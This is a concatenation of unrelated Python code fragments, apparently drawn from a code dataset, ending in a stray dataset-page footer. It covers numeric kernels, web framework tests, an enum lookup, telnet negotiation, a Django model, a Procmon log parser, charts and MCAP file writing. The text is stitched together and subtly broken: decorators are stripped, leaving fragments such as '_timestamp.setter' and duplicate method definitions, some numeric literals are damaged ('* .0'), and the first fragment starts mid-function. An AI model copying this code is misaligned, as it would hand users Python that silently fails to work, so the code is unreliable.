x21 = (x17 * x7)
x22 = (x13 + (x17 ** 2))
x23 = (x13 + (x3 ** 2))
x24 = (x11 + R[1])
x25 = (x19 * x24)
x26 = (x12 * x24)
x27 = (x7 * (x13 + x26))
x28 = (x16 + R[2])
x29 = (x19 * x28)
x30 = (x17 * x28)
x31 = (x7 * (x13 + x30))
result[(0, 0, 0)] = numpy.sum(((- x9) * ((x0 * ((((- 2.0) * x1) + A[0]) + R[0])) + (x3 * (x0 + (2.0 * x5))))))
result[(0, 1, 0)] = numpy.sum(((- x12) * x14))
result[(0, 2, 0)] = numpy.sum(((- x14) * x17))
result[(0, 3, 0)] = numpy.sum(((- x18) * x20))
result[(0, 4, 0)] = numpy.sum((((- x12) * x21) * x4))
result[(0, 5, 0)] = numpy.sum(((- x20) * x22))
result[(1, 0, 0)] = numpy.sum(((- x23) * x25))
result[(1, 1, 0)] = numpy.sum(((- x27) * x3))
result[(1, 2, 0)] = numpy.sum((((- x21) * x24) * x3))
result[(1, 3, 0)] = numpy.sum(((- x9) * ((x0 * ((((- 2.0) * x10) + A[1]) + R[1])) + (x12 * (x0 + (2.0 * x26))))))
result[(1, 4, 0)] = numpy.sum(((- x17) * x27))
result[(1, 5, 0)] = numpy.sum(((- x22) * x25))
result[(2, 0, 0)] = numpy.sum(((- x23) * x29))
result[(2, 1, 0)] = numpy.sum(((((- x12) * x28) * x3) * x7))
result[(2, 2, 0)] = numpy.sum(((- x3) * x31))
result[(2, 3, 0)] = numpy.sum(((- x18) * x29))
result[(2, 4, 0)] = numpy.sum(((- x12) * x31))
result[(2, 5, 0)] = numpy.sum(((- x9) * ((x0 * ((((- 2.0) * x15) + A[2]) + R[2])) + (x17 * (x0 + (2.0 * x30))))))
return result |
class TestSinkMethodCompatibility():
def _verify_kitchen_sink(self, client):
resp = client.simulate_request('BREW', '/features')
assert (resp.status_code == 200)
assert (resp.headers.get('X-Missing-Feature') == 'kitchen-sink')
def test_add_async_sink(self, client, asgi):
if (not asgi):
with pytest.raises(falcon.CompatibilityError):
client.app.add_sink(async_kitchen_sink)
else:
client.app.add_sink(async_kitchen_sink, '/features')
self._verify_kitchen_sink(client)
def test_add_sync_sink(self, client, asgi):
if asgi:
with disable_asgi_non_coroutine_wrapping():
with pytest.raises(falcon.CompatibilityError):
client.app.add_sink(kitchen_sink)
else:
client.app.add_sink(kitchen_sink, '/features')
self._verify_kitchen_sink(client)
def test_add_sync_sink_with_wrapping(self, client, asgi):
client.app.add_sink(kitchen_sink, '/features')
self._verify_kitchen_sink(client) |
def any_of(*exprs, **kwargs):
use_adaptive = (kwargs.pop('use_adaptive', use_adaptive_any_of) and SUPPORTS_ADAPTIVE)
reverse = reverse_any_of
if DEVELOP:
reverse = kwargs.pop('reverse', reverse)
internal_assert((not kwargs), 'excess keyword arguments passed to any_of', kwargs)
AnyOf = (MatchAny if use_adaptive else MatchFirst)
flat_exprs = []
for e in exprs:
if ((not (reverse and (not use_adaptive))) and (e.__class__ == AnyOf) and (not hasaction(e))):
flat_exprs.extend(e.exprs)
else:
flat_exprs.append(e)
if reverse:
flat_exprs = reversed([trace(e) for e in exprs])
return AnyOf(flat_exprs) |
_dict
def __new__(cls, value):
if (NoAlias in cls._settings_):
raise TypeError('NoAlias enumerations cannot be looked up by value')
if (type(value) is cls):
return value
try:
return cls._value2member_map_[value]
except KeyError:
pass
except TypeError:
for (member_value, member) in cls._value2member_seq_:
if (member_value == value):
return member
result = cls._missing_value_(value)
if isinstance(result, cls):
return result
elif ((result is not None) and (getattr(cls, '_boundary_', None) is EJECT)):
return result
elif (result is None):
if (value is no_arg):
raise ValueError(('%s() should be called with a value' % (cls.__name__,)))
else:
raise ValueError(('%r is not a valid %s' % (value, cls.__name__)))
else:
raise TypeError(('error in %s._missing_: returned %r instead of None or a valid member' % (cls.__name__, result))) |
class Naws():
def __init__(self, protocol):
self.naws_step = 0
self.protocol = protocol
self.protocol.protocol_flags['SCREENWIDTH'] = {0: DEFAULT_WIDTH}
self.protocol.protocol_flags['SCREENHEIGHT'] = {0: DEFAULT_HEIGHT}
self.protocol.negotiationMap[NAWS] = self.negotiate_sizes
self.protocol.do(NAWS).addCallbacks(self.do_naws, self.no_naws)
def no_naws(self, option):
self.protocol.handshake_done()
def do_naws(self, option):
self.protocol.handshake_done()
def negotiate_sizes(self, options):
if (len(options) == 4):
width = (options[0] + options[1])
self.protocol.protocol_flags['SCREENWIDTH'][0] = int(codecs_encode(width, 'hex'), 16)
height = (options[2] + options[3])
self.protocol.protocol_flags['SCREENHEIGHT'][0] = int(codecs_encode(height, 'hex'), 16) |
class Menu(models.Model):
nid = models.AutoField(primary_key=True)
menu_title = models.CharField(verbose_name='', max_length=16, null=True)
menu_title_en = models.CharField(verbose_name='', max_length=32, null=True)
title = models.CharField(verbose_name='slogan', max_length=32, null=True)
abstract = models.TextField(verbose_name='slogan', help_text='', null=True)
abstract_time = models.IntegerField(verbose_name='slogan', help_text=',8', default=8)
rotation = models.BooleanField(verbose_name='slogan', default=True)
menu_url = models.ManyToManyField(to='MenuImg', verbose_name='', help_text=',')
menu_rotation = models.BooleanField(verbose_name='banner', help_text='', default=False)
menu_time = models.IntegerField(verbose_name='', help_text=',8', default=8)
class Meta():
verbose_name_plural = '' |
class ViewerSession(object):
archFiles = None
items = None
def __init__(self):
self.archHandle = None
self.lastAccess = time.time()
self.pruneAge = (60 * 120)
def shouldPrune(self):
lastChange = (time.time() - self.lastAccess)
if (lastChange > self.pruneAge):
return True
else:
return False
def checkOpenArchive(self, archPath):
if ((not self.archHandle) or (self.archHandle.archPath != archPath)):
self.archHandle = ArchiveReader(archPath)
self.lastAccess = time.time()
def getItemByInternalPath(self, internalPath):
itemContent = self.archHandle.open(internalPath)
return (itemContent, internalPath)
def __del__(self):
if self.archHandle:
del self.archHandle |
def lazy_import():
from fastly.model.service_invitation_data_attributes import ServiceInvitationDataAttributes
from fastly.model.service_invitation_data_relationships import ServiceInvitationDataRelationships
from fastly.model.type_service_invitation import TypeServiceInvitation
globals()['ServiceInvitationDataAttributes'] = ServiceInvitationDataAttributes
globals()['ServiceInvitationDataRelationships'] = ServiceInvitationDataRelationships
globals()['TypeServiceInvitation'] = TypeServiceInvitation |
def read_event(io, metadata):
(process_idx, tid, event_class_val, operation_val, _, _, duration, date, result, stacktrace_depth, _, details_size, extra_details_offset) = CommonEventStruct.unpack(io.read(CommonEventStruct.size))
process = metadata.process_idx(process_idx)
event_class = EventClass(event_class_val)
operation = EventClassOperation[event_class](operation_val)
sizeof_stacktrace = (stacktrace_depth * metadata.sizeof_pvoid)
if metadata.should_get_stacktrace:
stream = BytesIO(io.read(sizeof_stacktrace))
stacktrace = [metadata.read_pvoid(stream) for _ in range(stacktrace_depth)]
else:
io.seek(sizeof_stacktrace, 1)
stacktrace = []
details = OrderedDict()
event = Event(process=process, tid=tid, event_class=event_class, operation=operation, duration=duration, date_filetime=date, result=result, stacktrace=stacktrace, category='', path='', details=details)
details_stream = BytesIO(io.read(details_size))
extra_details_stream = None
if (extra_details_offset > 0):
extra_details_offset -= ((CommonEventStruct.size + details_size) + sizeof_stacktrace)
assert (extra_details_offset >= 0)
current_offset = io.tell()
io.seek(extra_details_offset, 1)
extra_details_stream_size = read_u16(io)
extra_details_stream = BytesIO(io.read(extra_details_stream_size))
io.seek(current_offset, 0)
get_event_details(details_stream, metadata, event, extra_details_stream)
return event |
def make_hashable(obj: Any) -> Tuple:
if isinstance(obj, (tuple, list)):
return tuple((make_hashable(e) for e in obj))
if isinstance(obj, dict):
return tuple(sorted(((k, make_hashable(v)) for (k, v) in obj.items())))
if isinstance(obj, (set, frozenset)):
return tuple(sorted((make_hashable(e) for e in obj)))
if isinstance(obj, np.ndarray):
return make_hashable(obj.tolist())
return obj |
class TestParaphrase(unittest.TestCase):
def setUp(self) -> None:
self.num_perturbations = 4
self.perturber = Paraphrase(num_perturbations=self.num_perturbations, temperature=0.1)
return
def test_paraphrase(self):
for prompt in TRUTHFUL_DATASET:
sim_prompt = self.perturber.transform(prompt)
error_msg = f'Expected {self.num_perturbations} parphrases received {len(sim_prompt)}'
assert (len(sim_prompt) == self.num_perturbations), error_msg
return |
class IPv4Dscp(MatchTest):
def runTest(self):
match = ofp.match([ofp.oxm.eth_type(2048), ofp.oxm.ip_dscp(4)])
matching = {'dscp=4 ecn=0': simple_tcp_packet(ip_tos=16), 'dscp=4 ecn=3': simple_tcp_packet(ip_tos=19)}
nonmatching = {'dscp=5 ecn=0': simple_tcp_packet(ip_tos=20)}
self.verify_match(match, matching, nonmatching) |
def upgrade():
op.execute("UPDATE custom_forms SET is_public=True WHERE form='session' and (field_identifier='title' or field_identifier='subtitle' or field_identifier='shortAbstract' or field_identifier='longAbstract' or field_identifier='level' or field_identifier='track' or field_identifier='sessionType' or field_identifier='language' or field_identifier='slidesUrl' or field_identifier='videoUrl' or field_identifier='audioUrl');")
op.execute("UPDATE custom_forms SET is_public=True WHERE form='speaker' and (field_identifier='name' or field_identifier='photoUrl' or field_identifier='position' or field_identifier='country' or field_identifier='shortBiography' or field_identifier='longBiography' or field_identifier='website' or field_identifier='facebook' or field_identifier='github' or field_identifier='twitter' or field_identifier='linkedin' or field_identifier='instagram');")
op.execute("UPDATE custom_forms SET name='Organisation' WHERE form='attendee' and (field_identifier='company');") |
def pie_chart():
normal_radius = 100
hover_radius = 110
normal_title_style = ft.TextStyle(size=12, color=ft.colors.WHITE, weight=ft.FontWeight.BOLD)
hover_title_style = ft.TextStyle(size=16, color=ft.colors.WHITE, weight=ft.FontWeight.BOLD, shadow=ft.BoxShadow(blur_radius=2, color=ft.colors.BLACK54))
normal_badge_size = 40
hover_badge_size = 50
def badge(icon, size):
return ft.Container(ft.Icon(icon), width=size, height=size, border=ft.border.all(1, ft.colors.BROWN), border_radius=(size / 2), bgcolor=ft.colors.WHITE)
def on_chart_event(e: ft.PieChartEvent):
for (idx, section) in enumerate(chart.sections):
if (idx == e.section_index):
section.radius = hover_radius
section.title_style = hover_title_style
else:
section.radius = normal_radius
section.title_style = normal_title_style
chart.update()
chart = ft.PieChart(sections=[ft.PieChartSection(40, title='40%', title_style=normal_title_style, color=ft.colors.BLUE, radius=normal_radius, badge=badge(ft.icons.AC_UNIT, normal_badge_size), badge_position=0.98), ft.PieChartSection(30, title='30%', title_style=normal_title_style, color=ft.colors.YELLOW, radius=normal_radius, badge=badge(ft.icons.ACCESS_ALARM, normal_badge_size), badge_position=0.98), ft.PieChartSection(15, title='15%', title_style=normal_title_style, color=ft.colors.PURPLE, radius=normal_radius, badge=badge(ft.icons.APPLE, normal_badge_size), badge_position=0.98), ft.PieChartSection(15, title='15%', title_style=normal_title_style, color=ft.colors.GREEN, radius=normal_radius, badge=badge(ft.icons.PEDAL_BIKE, normal_badge_size), badge_position=0.98)], sections_space=0, center_space_radius=0, on_chart_event=on_chart_event, expand=True)
return ft.Column(controls=[ft.Container(content=chart, padding=10)]) |
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('csv', help='The input CSV to read')
parser.add_argument('--output', '-o', default='out.mcap', help='The MCAP output path to write')
args = parser.parse_args()
pointcloud: typing.Dict[(str, typing.Any)]
float32 = 7
pointcloud = {'point_stride': (((4 + 4) + 4) + 4), 'fields': [{'name': 'x', 'offset': 0, 'type': float32}, {'name': 'y', 'offset': 4, 'type': float32}, {'name': 'z', 'offset': 8, 'type': float32}, {'name': 'i', 'offset': 12, 'type': float32}]}
points = bytearray()
base_timestamp = None
for (point_timestamp, intensity, x, y, z) in point_reader(args.csv):
if (base_timestamp is None):
base_timestamp = point_timestamp
points.extend(struct.pack('<ffff', x, y, z, intensity))
assert (base_timestamp is not None), 'found no points in input csv'
pointcloud['data'] = base64.b64encode(points).decode('utf-8')
pointcloud['pose'] = {'position': {'x': 0, 'y': 0, 'z': 0}, 'orientation': {'x': 0, 'y': 0, 'z': 0, 'w': 1}}
pointcloud['frame_id'] = 'lidar'
with open(args.output, 'wb') as f:
writer = Writer(f)
writer.start()
with open((Path(__file__).parent / 'PointCloud.json'), 'rb') as f:
schema = f.read()
schema_id = writer.register_schema(name='foxglove.PointCloud', encoding=SchemaEncoding.JSONSchema, data=schema)
channel_id = writer.register_channel(topic='pointcloud', message_encoding=MessageEncoding.JSON, schema_id=schema_id)
for i in range(10):
frame_timestamp = (base_timestamp + datetime.timedelta(seconds=(i / 10.0)))
pointcloud['timestamp'] = {'sec': int(frame_timestamp.timestamp()), 'nsec': (frame_timestamp.microsecond * 1000)}
writer.add_message(channel_id, log_time=int((frame_timestamp.timestamp() * .0)), data=json.dumps(pointcloud).encode('utf-8'), publish_time=int((frame_timestamp.timestamp() * .0)))
writer.finish() |
class OptionSeriesDependencywheelZones(Options):
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get(None)
def color(self, text: str):
self._config(text, js_type=False)
def dashStyle(self):
return self._config_get(None)
def dashStyle(self, text: str):
self._config(text, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False) |
def _migrate_items_to_ecommerce_item(log):
shopify_fields = ['shopify_product_id', 'shopify_variant_id']
for field in shopify_fields:
if (not frappe.db.exists({'doctype': 'Custom Field', 'fieldname': field})):
return
items = _get_items_to_migrate()
try:
_create_ecommerce_items(items)
except Exception:
log.status = 'Error'
log.traceback = frappe.get_traceback()
log.save()
return
frappe.db.set_value(SETTING_DOCTYPE, SETTING_DOCTYPE, 'is_old_data_migrated', 1)
log.status = 'Success'
log.save() |
class FBPrintApplicationDocumentsPath(fb.FBCommand):
def name(self):
return 'pdocspath'
def description(self):
return "Print application's 'Documents' directory path."
def options(self):
return [fb.FBCommandArgument(short='-o', long='--open', arg='open', boolean=True, default=False, help='open in Finder')]
def run(self, arguments, options):
NSDocumentDirectory = '9'
NSUserDomainMask = '1'
path = fb.evaluateExpressionValue((((('(NSString*)[NSSearchPathForDirectoriesInDomains(' + NSDocumentDirectory) + ', ') + NSUserDomainMask) + ', YES) lastObject]'))
pathString = '{}'.format(path).split('"')[1]
cmd = 'echo {} | tr -d "\n" | pbcopy'.format(pathString)
os.system(cmd)
print(pathString)
if options.open:
os.system(('open ' + pathString)) |
class Movie(object):
def __init__(self, filename=None):
self._filename = filename
self._start_timestamp = None
self._end_timestamp = None
self._duration = None
self._events = {}
def filename(self):
return self._filename
def filename(self, value):
self._filename = value
def event(self, folder):
return self._events.get(folder)
def set_event(self, event_info: Event):
self._events.update({event_info.filename: event_info})
def item(self, value):
return self.event(value)
def first_item(self):
return self.event(self.sorted[0])
def items(self):
return self._events.items()
def items_sorted(self):
sorted_items = []
for event in self.sorted:
sorted_items.append(self.event(event))
return sorted_items
def start_timestamp(self):
if (self._start_timestamp is not None):
return self._start_timestamp
if (len(self.items) == 0):
return datetime.now()
return self.event(self.sorted[0]).start_timestamp
_timestamp.setter
def start_timestamp(self, value):
self._start_timestamp = value
def end_timestamp(self):
if (self._end_timestamp is not None):
return self._end_timestamp
if (len(self.items) == 0):
return self.start_timestamp
end_timestamp = self.event(self.sorted[(- 1)]).end_timestamp
for (_, event_info) in self.items:
end_timestamp = (event_info.end_timestamp if (event_info.end_timestamp > end_timestamp) else end_timestamp)
return end_timestamp
_timestamp.setter
def end_timestamp(self, value):
self._end_timestamp = value
def duration(self):
return ((self.end_timestamp - self.start_timestamp).total_seconds() if (self._duration is None) else self._duration)
def duration(self, value):
self._duration = value
def count(self):
return len(self._events)
def count_clips(self):
count = 0
for (_, event_info) in self.items:
count = (count + event_info.count)
return count
def sorted(self):
return sorted(self._events, key=(lambda clip: self._events[clip].start_timestamp)) |
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', required=True, type=str, help='Input .rdb file')
parser.add_argument('-g', required=True, type=str, help='Input tag group definition file')
parser.add_argument('-o', required=True, type=str, help='Output .rdb file')
args = parser.parse_args()
tag_groups = load_tag_groups(args.g)
segbits = load_segbits(args.i)
bit_groups = find_common_bits_for_tag_groups(segbits, tag_groups)
segbits = group_tags(segbits, tag_groups, bit_groups)
save_segbits(args.o, segbits) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.